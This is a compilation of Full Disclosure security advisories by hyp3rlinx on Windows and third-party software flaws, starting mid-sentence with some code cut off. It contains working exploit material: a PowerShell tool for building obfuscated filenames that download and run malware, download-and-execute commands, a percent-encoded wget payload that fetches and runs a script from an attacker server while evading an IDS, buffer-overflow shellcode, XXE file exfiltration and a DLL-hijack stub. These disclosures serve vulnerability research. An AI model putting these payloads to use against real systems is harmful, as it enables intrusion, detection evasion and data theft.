for the correct IOC name if the malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights. Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd. However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages. Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing files or folders in the local file system. Tested successfully Win7/10 [Exploit/POC] "NtFileSins.py" from subprocess import Popen, PIPE import sys,argparse,re # Windows File Enumeration Intel Gathering. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can
[FD] GGPowerShell / Windows PowerShell Unsanitized RCE File Tool
Tool for creating Windows .PS files with the exploitable semicolon condition. Has some options like reverse string PS command payload and IP address as integer value etc... http://hyp3rlinx.altervista.org/advisories/GGPowerShell.txt from base64 import b64encode from base64 import b64decode from socket import * import argparse,sys,socket,struct,re #GGPowerShell #Microsoft Windows PowerShell - Unsantized Filename RCE Dirty File Creat0r. # #Original advisory: #http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt # #Original PoC: #https://www.youtube.com/watch?v=AH33RW9g8J4 # #By John Page (aka hyp3rlinx) #Apparition Security #= #Features added to the original advisory script: # #Original script may have issues with -O for save files with certain PS versions, so now uses -OutFile. # #Added: server port option (Base64 mode only) # #Added: -z Reverse String Command as an alternative to default Base64 encoding obfuscation. #Example self reversing payload to save and execute a file "n.js" from 127.0.0.1 port 80 is only 66 bytes. # #$a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a # #-z payload requires a forced malware download on server-side, defaults port 80 and expects an ip-address. # #Added: IP to Integer for extra evasion - e.g 127.0.0.1 = 2130706433 # #Added: Prefix whitespace - attempt to hide the filename payload by push it to the end of the filename. # #Since we have space limit, malware names should try be 5 chars max e.g. 'a.exe' including the ext to make room for #IP/Host/Port and whitespace especially when Base64 encoding, for reverse command string option we have more room to play. #e.g. a.exe or n.js (1 char for the name plus 2 to 3 chars for ext plus the dot). # #All in the name of the dirty PS filename. #= BANNER=''' _ __ _ ____ / / / __ \ _ _ _/ ___// /_ |__ // / / / / / __/ / __/ /_/ / __ \ | /| / / _ \/ ___/\__ \/ __ \ /_ -i flag, force-download or omit whitespace." def parse_args(): parser.add_argument("-s", "--server", help="Server to download malware from.") parser.add_argument("-p", "--port", help="Malware server port, defaults 80.") parser.add_argument("-m", "--locf", help="Name for the Malware upon download.") parser.add_argument("-r", "--remf", nargs="?", help="Malware to download from the remote server.") parser.add_argument("-f", "--force_download", nargs="?", const="1", help="No malware name specified, malwares force downloaded from the server web-root, malware type must be known up front.") parser.add_argument("-z", "--rev_str_cmd", nargs="?", const="1", help="Reverse string command obfuscation Base64 alternative, ip-address and port 80 only, Malware must be force downloaded on the server-side, see -e.") parser.add_argument("-w", "--wspace", help="Amount of whitespace to use for added obfuscation, Base64 is set for 2 bytes.") parser.add_argument("-i", "--ipevade", nargs="?", const="1", help="Use the integer value of the malware servers IP address for obfuscation/evasion.") parser.add_argument("-e", "--example", nargs="?", const="1", help="Show example use cases") return parser.parse_args() #self reverse PS commands def rev_str_command(args): malware=args.locf[::-1] revload=malware revload+=" trats;" revload+=malware revload+=" eliFtuO- " revload+=args.server[::-1] revload+=" rwi" payload = "$a='" payload+=malware payload+=" trats;" payload+=malware payload+=" eliFtuO- " payload+=args.server[::-1] payload+=" rwi'[-1..-"+str(len(revload)) payload+="]-join '';iex $a" return payload def ip2int(addr): return struct.unpack("!I", inet_aton(addr))[0] def ip2hex(ip): x = ip.split('.') return '0x{:02X}{:02X}{:02X}{:02X}'.format(*map(int, x)) def obfuscate_ip(target): IPHex = ip2hex(target) return str(ip2int(IPHex)) def decodeB64(p): return b64decode(p) def validIP(host): try: socket.inet_aton(host) return True except socket.error: return False def filename_sz(space,cmds,mode): if mode==0: return len(FILENAME_PREFIX)+len(space)+ 1 +len(POWERSHELL_OBFUSCATED)+ 4 + len(cmds)+ len(";.ps1") else: return len(FIL
[FD] Microsoft Windows PowerShell / Unsanitized Filename Command Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Windows PowerShell Windows PowerShell is a Windows command-line shell designed especially for system administrators. PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination. [Vulnerability Type] Unsanitized Filename Command Execution [CVE Reference] N/A [Security Issue] PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file; or the running of unexpected commands straight from the filename itself without the need for a second file. For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf. Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script. However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working. Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell. My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant. Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest) abbreviated for space then it sleeps for 2 seconds and finally executes. C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed. We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are commands can be stored. For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files. First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe". c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) Give the PS script a normal begining name, then separate commands using ";" semicolon e.g. Test;powershell -e ;2.ps1 Create the executable without a file extension to save space for the filename then save it back using the -O parameter. The "-e" is abbreviated for EncodedCommand to again save filename space. Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever. Double click to open in PowerShell watch the file get downloaded saved and executed! My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory. Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string! [Exploit / PoC] from base64 import b64encode import argparse,sys #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. #Expects hostname/ip-addr of web-server housing the exploit. #By hyp3rlinx #Apparition Security # def parse_args(): parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") parser.add_argument("-r", "--remote_malware_name"
[FD] Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt [+] ISR: Apparition Security [Vendor] www.trendmicro.com [Product] Deep Discovery Inspector Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker activities that are invisible to standard security defenses. [Vulnerability Type] Percent Encoding IDS Bypass [CVE Reference] Vendor decided not to release a CVE [Security Issue] Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high. Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on. However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and will not get flagged or alerted on and may still be processed on the target system. e.g. DDI RULE 2452 https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452 Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74. That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command. Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for percent encoded HEX character payload values. [Exploit/POC] from socket import * #Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC #Discovery: hyp3rlinx - ApparitionSec #Apparition Security #Firewall Rule Bypass IP = raw_input("[+] Trend Micro IDS") PORT = 80 payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20 http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a " req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n" s=socket(AF_INET, SOCK_STREAM) s.connect((IP, PORT)) s.send(req) res="" while True: res = s.recv(512) print res if res=="\n" or "": break s.close() #Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered. [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: May 14, 2019 Vendor confirmed the IDS Bypass: May 20, 2019 Vendor informed that a DDI IDS enhancement has been made: July 18, 2019 July 23, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt [+] ISR: Apparition Security [Vendor] www.computerlab.com [Product] MAPLE Computer WBT SNMP Administrator (Thin Client Administrator) v2.0.195.15 https://www.computerlab.com/index.php/downloads/category/27-device-manager ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4 The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients. This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol). Agents are built into the clients for remote management and configuration. [Vulnerability Type] Unauthenticated Remote Buffer Overflow Code Execution 0day [CVE Reference] CVE-2019-13577 [Security Issue] SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987. This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution. Authentication is not required for this exploit. This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code. When installing the vulnerable program if asks for a serial number just enter a value of "1" or something. Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin. Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them. e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp ASLR / SEH all set to False helping to make exploit more portable. CALL EBX 10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll) Stack dump: EAX 41414141 ECX 0018FEFC EDX 0018FF10 EBX 022DDA78 ASCII "AAA ESP 0018FECC EBP 0018FEF4 ESI 0018FF10 EDI 0018FEFC EIP 41414141 C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 0 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_NO_SCROLLBARS (05A7) EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G) [Exploit/POC] from socket import * import struct,sys,argparse #MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15 #CVE-2019-13577 #Remote Buffer Overflow 0day #hyp3rlinx - ApparitionSec #Pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") eip = struct.pack(" 1: print "[*] No args supplied see Help -h" exit() main(parse_args()) [POC Video URL] https://www.youtube.com/watch?v=THMqueCIrFw [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: July 10, 2019 Second vendor notification attempt: July 13, 2019 No vendor replies. July 17, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[** CORRECTION Fixed Port Typo] [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Compiled HTML Help "hh.exe" Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program. [Vulnerability Type] Uncompiled .CHM File XML External Entity Injection [CVE Reference] N/A [Security Issue] CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc. Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files. Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process. Note: User interaction is required to exploit this vulnerability. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "XXE.chm.chm" Uncompiled CHM File XXE PoC http://localhost:81/payload.dtd";> %dtd;]> &send; 3) "payload.dtd" (hosted in python web-server dir port 81 above) http://localhost:81?%file;'>"> %all; Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC. Tested successfully Windows 7/10 [POC Video URL] https://www.youtube.com/watch?v=iaxp1iBDWXY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: April 25, 2019 MSRC Response: "We determined that this behavior is considered to be by design" July 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx On Tue, Jul 16, 2019 at 12:10 AM hyp3rlinx wrote: > [+] Credits: John Page (aka hyp3rlinx) > [+] Website: hyp3rlinx.altervista.org > [+] Source: > http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt > [+] ISR: ApparitionSec > > > [Vendor] > www.microsoft.com > > > [Product] > Microsoft Compiled HTML Help "hh.exe" > > Microsoft Compiled HTML Help is a Microsoft proprietary online help > format, consisting of a collection of HTML pages, an index and other > navigation tools. > The files are compressed and deployed in a binary format with the > extension .CHM, for Compiled HTML. The format is often used for software > documentation. > CHM is an extension for the Compiled HTML file format, most commonly used > by Microsoft's HTML-based help program. > > > [Vulnerability Type] > Uncompiled .CHM File XML External Entity Injection > > > [CVE Reference] > N/A > > > [Security Issue] > CHM Files are usually created using Microsofts "HTML Help Workshop" > program. However, I find a way to bypass using this program and create them > easily by > simply adding double .chm extension to the file ".chm.chm". Compiled HTML > Help "hh.exe" will then respect and open it proc
[FD] Microsoft File Checksum Integrity Verifier "fciv.exe" v2.05 / DLL Hijack Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-FILE-CHECKSUM-VERIFIER-v2.05-DLL-HIJACKING-ARBITRARY-CODE-EXECUTION.txt [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] File Checksum Integrity Verifier version 2.05 "fciv.exe" Download: https://www.microsoft.com/en-us/download/details.aspx?id=11533 Excerpt from the FCIV "ReadMe.txt" file. "Fciv is a command line utility that computes and verifies hashes of files. It computes a MD5 or SHA1 cryptographic hash of the content of the file. If the file is modified, the hash is different. With fciv, you can compute hashes of all your sensitive files. When you suspect that your system has been compromised, you can run a verification to determine which files have been modified. You can also schedule verifications regularily." [Vulnerability Type] DLL Hijacking Arbitrary Code Execution [CVE Reference] N/A [Security Issue] File Checksum Integrity Verifier "fciv.exe" will load and execute arbitrary DLLs "CRYPTSP.dll" or "USERENV.dll" when verifying a file hash, if one of those DLLs exist in the same directory (CWD) from where FCIV is run. During testing I observed that on a Windows 10 system both "CRYPTSP.dll" or "USERENV.dll" will execute no problem. However, only "CRYPTSP.dll" seems to work on the Windows 7 machine I tested. Therefore, if a malware is named "CRYPTSP.dll" or "USERENV.dll" and you try to verify its hash it will instead get executed. Upon successfull exploit user will get the following error. // // File Checksum Integrity Verifier version 2.05. // Error during CryptAcquireContext. Error msg : The specified procedure could not be found. Error code : 7f Again, to exploit this the victim must run the FCIV from an infected directory where the compromised DLL lives. c:\>fciv.exe "CRYPTSP.dll" OR from network share where an attacker has write privileges. net use z: \\x.x.x.x\c$ /user:victim z:\Users\victim\Desktop>fciv.exe c:\Windows This was tested successfully on Windows 7/10 [Exploit/POC] Create a DLL named "cryptsp.dll" and download to your default Downloads directory or wherever. "evil.c" #include //gcc -shared -o cryptsp.dll evil.c void evilo(void){ WinExec("calc", 0); } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){ evilo(); return 0; } Start fciv.exe from the same dir where cryptsp.dll resides to verify the hash of the DLL. C:\Users\victim\Downloads>fciv.exe cryptsp.dll BOOM! no hash verified but we do get arbitrary code execution... [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: June 3, 2019 MSRC Response: "The Checksum Integrity Verifier tool is not supported by Microsoft." : June 7, 2019 July 4, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2019-12323 / HC10 HC.Server Service 10.14 / Remote Invalid Pointer Write
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt [+] ISR: ApparitionSec [Vendor] www.hostingcontroller.com [Product] HC10 HC.Server Service 10.14 HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers simultaneously as part of a single cluster. HC works on an N-tier user model. [Vulnerability Type] Remote Invalid Pointer Write [CVE Reference] CVE-2019-12323 [Security Issue] The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794. In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved. If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence. Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program. The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService". Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10. SERVICE_NAME: HCServerService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe" LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : HC Server Service DEPENDENCIES : HCProvisioningService SERVICE_START_NAME : LocalSystem Crash Dump: INVALID_POINTER_WRITE_EXPLOITABLE CONTEXT: (.ecxr) rax=0bfd rbx=00df94f0 rcx=03743db166a9 rdx=8000 rsi=00b4 rdi= rip=000140025b6c rsp=0118f570 rbp= r8=001f r9=06fe r10=0603 r11=00df0158 r12= r13= r14= r15= iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 HC_Server+0x25b6c: 0001`40025b6c c68404d00100 mov byte ptr [rsp+rax+1D0h],0 ss:`0119033d=?? Resetting default scope FAULTING_IP: HC_Server+25b6c 0001`40025b6c c68404d00100 mov byte ptr [rsp+rax+1D0h],0 EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 000140025b6c (HC_Server+0x00025b6c) ExceptionCode: c005 (Access violation) ExceptionFlags: NumberParameters: 2 Parameter[0]: 0001 Parameter[1]: 0119033d Attempt to write to address 0119033d PROCESS_NAME: HC.Server.exe [Exploit/POC] 1) Configure the HCServiceService recovery failure options to an arbitrary program. 2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges. from socket import * IP = raw_input("[+] HC Server Service IP ") PORT = 8794 payload = "A"*4000 s=socket(AF_INET,SOCK_STREAM) s.connect((IP, PORT)) s.send(payload) s.close() print "Triggering HC10 Server Service Xploit" print "hyp3rlinx" [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: May 14, 2019 No reply Second notification: May 21, 2019 Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019 mitre assign CVE: May 27, 2019 Vendor : "New installer to be released June 13, 2019" June 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Word (2016) / Deceptive File Reference Vuln
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Microsoft Word 2016 [Vulnerability Type] Deceptive File Reference [References] ZDI-CAN-7949 [Security Issue] When a MS Word ".docx" File contains a hyperlink to another file, it will run the first file it finds in that directory with a valid extension. But will present to the end user an extension-less file in its Security warning dialog box without showing the extension type. If another "empty" file of the same name as the target executable exists but has no file extension. Because the extension is supressed it makes the file seem harmless and the file can be masked to appear as just a folder etc. This can potentially trick user into running unexpected code, but will only work when you have an additional file of same name with NO extension on it. [Exploit/POC] 1) Create a directory "PoC" 2) Create a folder in PoC directory named "Downloads Folder" 3) Create a .BAT file named "Downloads Folder.bat" in the .BAT create some command like "start calc.exe" 4) Create an empty file named "Downloads Folder" with no file extension 5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads Folder/Downloads Folder" Upon opening the link Word will give user an vague dialog box about asking if they want to open the file. However, the prompt shows an apparent folder structure and no file extension .exe, .com etc are visible or displayed to the end user. Click the link to open what looks to be a folder then BOOM! the .BAT file runs instead. Of course any exeuctable will do .EXE etc. [Network Access] Local [Severity] High [POC Video URL] https://www.youtube.com/watch?v=irxkV_qGG9Y [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program : 2019-01-25 Case officially contracted to ZDI : 2019-02-06 Vendor Disclosure : 2019-02-15 submitted to the vendor as ZDI-CAN-7949. ZDI Response : "We have synced with the vendor and they have resolved that this case does not meet the bar for security servicing. Therefore we will proceed to close it on our end." 2019-06-14 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Windows PowerShell ISE The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell. In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface. [Vulnerability Type] Filename Parsing Flaw Remote Code Execution 0day [References] ZDI-CAN-8005 [Security Issue] Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of PowerShell ISE allowing potential unexpected remote code execution. In PowerShell brackets are used to access array elements. PS C:\> $a=1..10 PS C:\> $a[4] 5 However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file. That file must contain a single matching char value which is also found in our specially crafted filename. Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L". Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols. PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application. These chars also get the job done: "$" "_" "#" "^" plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 > _.ps1 [Hello].ps1 will execute this instead => h.ps1 Dashes "-" throw the following error: "The specified wildcard character pattern is 